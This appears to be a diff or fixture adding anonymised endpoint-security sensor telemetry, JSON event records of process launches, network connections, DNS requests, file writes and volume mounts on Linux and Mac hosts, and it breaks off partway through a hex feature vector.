+{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"67.43.156.14","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"67.43.156.14","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"67.43.156.13","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"} +{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"} +{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"67.43.156.14","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"67.43.156.13","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"67.43.156.14","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMajor":"1","VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"67.43.156.14","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"3967242894","aip":"67.43.156.13","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.14","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"} +{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"} +{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"67.43.156.13","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"67.43.156.14","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"67.43.156.14","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"} +{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"67.43.156.14","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-0234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"67.43.156.14","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" -daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"FeatureVector":"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f69400392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3